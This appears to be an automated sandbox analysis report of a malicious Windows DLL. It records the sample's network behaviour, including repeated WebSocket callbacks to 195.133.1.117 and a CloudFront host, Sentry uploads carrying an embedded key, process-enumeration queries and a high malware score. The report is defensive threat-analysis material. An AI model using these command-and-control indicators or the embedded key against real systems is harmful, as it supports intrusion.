    Source: Binary string: profapi.pdbeionionport: source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: msvcrt.pdbEedon source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ile":"kernelbase.pdb source: rundll32.exe, 0000000D.00000003.3239400696.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313815899.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3237961840.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935513236.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787122688.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714502002.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461958386.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714437251.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387036812.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862052201.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521748816.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787058914.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2639067578.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562830811.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: fastprox.pdbcurityTools source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: sideload.pdbM Win32_Fan: source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: rasadhlp.pdbcurityToolsR source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp

    Networking

    barindex
    System process connects to network (likely due to code injection or exploit)
    Source: C:\Windows\System32\rundll32.exeNetwork Connect: 34.120.62.213 443Jump to behavior
    Source: C:\Windows\System32\rundll32.exeNetwork Connect: 195.133.1.117 80Jump to behavior
    Source: C:\Windows\System32\rundll32.exeNetwork Connect: 13.227.9.174 80Jump to behavior
    Source: C:\Windows\System32\rundll32.exeNetwork Connect: 13.227.9.48 80Jump to behavior
    Source: global trafficHTTP traffic detected: POST /api/4508128821837904/envelope/ HTTP/1.1x-sentry-auth: Sentry sentry_key=d9163996e0bda3370ab4e6b347b338e4, sentry_version=7, sentry_timestamp=1734624283.5827143, sentry_client=sentry.rust/0.34.0accept: */*host: o4508128816857088.ingest.de.sentry.iocontent-length: 11418
    Source: global trafficHTTP traffic detected: POST /api/4508128821837904/envelope/ HTTP/1.1x-sentry-auth: Sentry sentry_key=d9163996e0bda3370ab4e6b347b338e4, sentry_version=7, sentry_timestamp=1734624283.5827143, sentry_client=sentry.rust/0.34.0accept: */*host: o4508128816857088.ingest.de.sentry.iocontent-length: 12516
    Source: global trafficHTTP traffic detected: GET /ws HTTP/1.1Host: d2np1vqkcxhde6.cloudfront.netConnection: UpgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: hYIl3tcxOdFjfsPRnTVigw==
    Source: global trafficHTTP traffic detected: GET /ws HTTP/1.1Host: d2np1vqkcxhde6.cloudfront.netConnection: UpgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: 4o/S/DnI/xUOQ7/tWSDOmw==
    Source: global trafficHTTP traffic detected: GET /ws HTTP/1.1Host: 195.133.1.117Connection: UpgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: mm3wcIuOeiJHtLi7cs4F3g==
    Source: global trafficHTTP traffic detected: GET /ws HTTP/1.1Host: d2np1vqkcxhde6.cloudfront.netConnection: UpgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: RNaQVJ0zTL1uqG8J1zu+SQ==
    Source: global trafficHTTP traffic detected: GET /ws HTTP/1.1Host: 195.133.1.117Connection: UpgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: gJK8B/FHxxJOrYPc07zPdA==
    Source: global trafficHTTP traffic detected: GET /ws HTTP/1.1Host: d2np1vqkcxhde6.cloudfront.netConnection: UpgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: 3I3wooedh91j3GxPYkeArw==
    Source: global trafficHTTP traffic detected: GET /ws HTTP/1.1Host: 195.133.1.117Connection: UpgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: JApRj8zYZyC8oZg2we4Azg==
    Source: global trafficHTTP traffic detected: GET /ws HTTP/1.1Host: d2np1vqkcxhde6.cloudfront.netConnection: UpgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: MG/uZPS22IGDcq20LYVyjA==
    Source: global trafficHTTP traffic detected: GET /ws HTTP/1.1Host: 195.133.1.117Connection: UpgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: /G1bGErhqg3xJ3/YMCdIKA==
    Source: global trafficHTTP traffic detected: GET /ws HTTP/1.1Host: d2np1vqkcxhde6.cloudfront.netConnection: UpgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: o9P6bbQkBpkHJSDprgi2YQ==
    Source: global trafficHTTP traffic detected: GET /ws HTTP/1.1Host: 195.133.1.117Connection: UpgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: MG/wcOLqwZyraIHV6mN2eA==
    Source: global trafficHTTP traffic detected: GET /ws HTTP/1.1Host: d2np1vqkcxhde6.cloudfront.netConnection: UpgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: enC0Es7mdVSw6GUwznNaLQ==
    Source: global trafficHTTP traffic detected: GET /ws HTTP/1.1Host: 195.133.1.117Connection: UpgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: YZ6gImeX26KgQbaMt7jJTg==
    Source: global trafficHTTP traffic detected: GET /ws HTTP/1.1Host: d2np1vqkcxhde6.cloudfront.netConnection: UpgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: mgtSMK+F6GzpGcK4RpjtGQ==
    Source: global trafficHTTP traffic detected: GET /ws HTTP/1.1Host: 195.133.1.117Connection: UpgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: 1W7A8pWbhZreG2T6Et2+aw==
    Source: global trafficHTTP traffic detected: GET /ws HTTP/1.1Host: d2np1vqkcxhde6.cloudfront.netConnection: UpgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: 3bAo+RHHQYr0rCo3Cvgr5g==
    Source: global trafficHTTP traffic detected: GET /ws HTTP/1.1Host: 195.133.1.117Connection: UpgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: RWInDnK7aInVBvxdqgFRfw==
    Source: Joe Sandbox ViewASN Name: MTW-ASRU MTW-ASRU
    Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
    Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.1.117
    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.1.117
    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.1.117
    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.1.117
    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.1.117
    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.1.117
    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.1.117
    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.1.117
    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.1.117
    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.1.117
    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.1.117
    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.1.117
    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.1.117
    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.1.117
    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.1.117
    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.1.117
    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.1.117
    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.1.117
    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.1.117
    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.1.117
    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.1.117
    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.1.117
    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.1.117
    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.1.117
    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.1.117
    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.1.117
    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.1.117
    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.1.117
    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.1.117
    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.1.117
    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.1.117
    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.1.117
    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.1.117
    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.1.117
    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.1.117
    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.1.117
    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.1.117
    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.1.117
    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.1.117
    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.1.117
    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.1.117
    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.1.117
    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.1.117
    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.1.117
    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.1.117
    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.1.117
    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.1.117
    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.1.117
    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.1.117
    Source: unknownTCP traffic detected without corresponding DNS query: 195.133.1.117
    Source: global trafficHTTP traffic detected: GET /ws HTTP/1.1Host: d2np1vqkcxhde6.cloudfront.netConnection: UpgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: hYIl3tcxOdFjfsPRnTVigw==
    Source: global trafficHTTP traffic detected: GET /ws HTTP/1.1Host: d2np1vqkcxhde6.cloudfront.netConnection: UpgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: 4o/S/DnI/xUOQ7/tWSDOmw==
    Source: global trafficHTTP traffic detected: GET /ws HTTP/1.1Host: 195.133.1.117Connection: UpgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: mm3wcIuOeiJHtLi7cs4F3g==
    Source: global trafficHTTP traffic detected: GET /ws HTTP/1.1Host: d2np1vqkcxhde6.cloudfront.netConnection: UpgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: RNaQVJ0zTL1uqG8J1zu+SQ==
    Source: global trafficHTTP traffic detected: GET /ws HTTP/1.1Host: 195.133.1.117Connection: UpgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: gJK8B/FHxxJOrYPc07zPdA==
    Source: global trafficHTTP traffic detected: GET /ws HTTP/1.1Host: d2np1vqkcxhde6.cloudfront.netConnection: UpgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: 3I3wooedh91j3GxPYkeArw==
    Source: global trafficHTTP traffic detected: GET /ws HTTP/1.1Host: 195.133.1.117Connection: UpgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: JApRj8zYZyC8oZg2we4Azg==
    Source: global trafficHTTP traffic detected: GET /ws HTTP/1.1Host: d2np1vqkcxhde6.cloudfront.netConnection: UpgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: MG/uZPS22IGDcq20LYVyjA==
    Source: global trafficHTTP traffic detected: GET /ws HTTP/1.1Host: 195.133.1.117Connection: UpgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: /G1bGErhqg3xJ3/YMCdIKA==
    Source: global trafficHTTP traffic detected: GET /ws HTTP/1.1Host: d2np1vqkcxhde6.cloudfront.netConnection: UpgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: o9P6bbQkBpkHJSDprgi2YQ==
    Source: global trafficHTTP traffic detected: GET /ws HTTP/1.1Host: 195.133.1.117Connection: UpgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: MG/wcOLqwZyraIHV6mN2eA==
    Source: global trafficHTTP traffic detected: GET /ws HTTP/1.1Host: d2np1vqkcxhde6.cloudfront.netConnection: UpgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: enC0Es7mdVSw6GUwznNaLQ==
    Source: global trafficHTTP traffic detected: GET /ws HTTP/1.1Host: 195.133.1.117Connection: UpgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: YZ6gImeX26KgQbaMt7jJTg==
    Source: global trafficHTTP traffic detected: GET /ws HTTP/1.1Host: d2np1vqkcxhde6.cloudfront.netConnection: UpgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: mgtSMK+F6GzpGcK4RpjtGQ==
    Source: global trafficHTTP traffic detected: GET /ws HTTP/1.1Host: 195.133.1.117Connection: UpgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: 1W7A8pWbhZreG2T6Et2+aw==
    Source: global trafficHTTP traffic detected: GET /ws HTTP/1.1Host: d2np1vqkcxhde6.cloudfront.netConnection: UpgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: 3bAo+RHHQYr0rCo3Cvgr5g==
    Source: global trafficHTTP traffic detected: GET /ws HTTP/1.1Host: 195.133.1.117Connection: UpgradeUpgrade: websocketSec-WebSocket-Version: 13Sec-WebSocket-Key: RWInDnK7aInVBvxdqgFRfw==
    Source: global trafficDNS traffic detected: DNS query: d2np1vqkcxhde6.cloudfront.net
    Source: global trafficDNS traffic detected: DNS query: o4508128816857088.ingest.de.sentry.io
    Source: unknownHTTP traffic detected: POST /api/4508128821837904/envelope/ HTTP/1.1x-sentry-auth: Sentry sentry_key=d9163996e0bda3370ab4e6b347b338e4, sentry_version=7, sentry_timestamp=1734624283.5827143, sentry_client=sentry.rust/0.34.0accept: */*host: o4508128816857088.ingest.de.sentry.iocontent-length: 11418
    Source: 8N8j6QojHn.dllString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
    Source: 8N8j6QojHn.dllString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
    Source: 8N8j6QojHn.dllString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
    Source: 8N8j6QojHn.dllString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
    Source: 8N8j6QojHn.dllString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
    Source: 8N8j6QojHn.dllString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
    Source: 8N8j6QojHn.dllString found in binary or memory: http://ocsp.digicert.com0C
    Source: 8N8j6QojHn.dllString found in binary or memory: http://ocsp.digicert.com0N
    Source: Amcache.hve.10.drString found in binary or memory: http://upx.sf.net
    Source: 8N8j6QojHn.dllString found in binary or memory: http://www.digicert.com/CPS0
    Source: rundll32.exe, 00000006.00000002.2415158087.00007FFD9467D000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000007.00000002.2373403680.00007FFD9467D000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000C.00000002.2471395632.00007FFD9467D000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000D.00000002.3522600692.00007FFD9467D000.00000002.00000001.01000000.00000003.sdmp, 8N8j6QojHn.dllString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
    Source: rundll32.exe, 0000000D.00000002.3521988705.0000025BF00BB000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3314134932.0000025BF00AF000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163928030.0000025BF00AF000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521988705.0000025BF009D000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239485675.0000025BF00AF000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387123364.0000025BF00AF000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461769420.0000025BF009B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://docs.sentry.io/product/accounts/quotas/
    Source: rundll32.exe, 0000000D.00000003.3239400696.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313815899.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3237961840.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935513236.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787122688.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714502002.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461958386.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714437251.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387036812.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE1F8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862052201.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521748816.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787058914.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2639067578.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562830811.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://o4508128816857088.ingest.de.sentry.io/api/4508128821837904/envelope/
    Source: rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935513236.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787122688.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714502002.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714437251.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862052201.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787058914.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2639067578.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562830811.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://o4508128816857088.ingest.de.sentry.io/api/4508128821837904/envelope/Se
    Source: rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935513236.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787122688.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714502002.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714437251.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862052201.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787058914.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2639067578.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562830811.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://o4508128816857088.ingest.de.sentry.io/api/4508128821837904/envelope/d
    Source: rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935513236.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787122688.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714502002.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714437251.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862052201.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787058914.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2639067578.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562830811.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://o4508128816857088.ingest.de.sentry.io/api/4508128821837904/envelope/dll
    Source: rundll32.exe, 00000007.00000002.2372761198.000001F583D6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://o4508128816857088.ingest.de.sentry.io/api/4508128821837904/envelope/e
    Source: rundll32.exe, 00000007.00000002.2372761198.000001F583D6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://o4508128816857088.ingest.de.sentry.io/api/4508128821837904/envelope/e.mui?
    Source: 8N8j6QojHn.dllString found in binary or memory: https://www.digicert.com/CPS0
    Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
    Source: unknownHTTPS traffic detected: 34.120.62.213:443 -> 192.168.2.6:49769 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 34.120.62.213:443 -> 192.168.2.6:49933 version: TLS 1.2
    Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FFD9465D8D06_2_00007FFD9465D8D0
    Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FFD9465A0B06_2_00007FFD9465A0B0
    Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FFD946596B06_2_00007FFD946596B0
    Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FFD944D62906_2_00007FFD944D6290
    Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FFD9466ED406_2_00007FFD9466ED40
    Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FFD9464D5006_2_00007FFD9464D500
    Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FFD944B25B06_2_00007FFD944B25B0
    Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FFD9464FFC06_2_00007FFD9464FFC0
    Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FFD944B1DA06_2_00007FFD944B1DA0
    Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FFD943A19E06_2_00007FFD943A19E0
    Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FFD9466F7F06_2_00007FFD9466F7F0
    Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FFD9465D1E06_2_00007FFD9465D1E0
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5860 -s 428
    Source: 8N8j6QojHn.dllBinary string: \Device\Afd\Mio
    Source: 8N8j6QojHn.dllBinary string: Failed to open \Device\Afd\Mio: h
    Source: classification engineClassification label: mal96.evad.winDLL@22/9@3/5
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6808:120:WilError_03
    Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6728
    Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5860
    Source: C:\Windows\System32\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\93e4e027-6f7d-4e39-8bd3-3c31d2ebd916Jump to behavior
    Source: 8N8j6QojHn.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Process
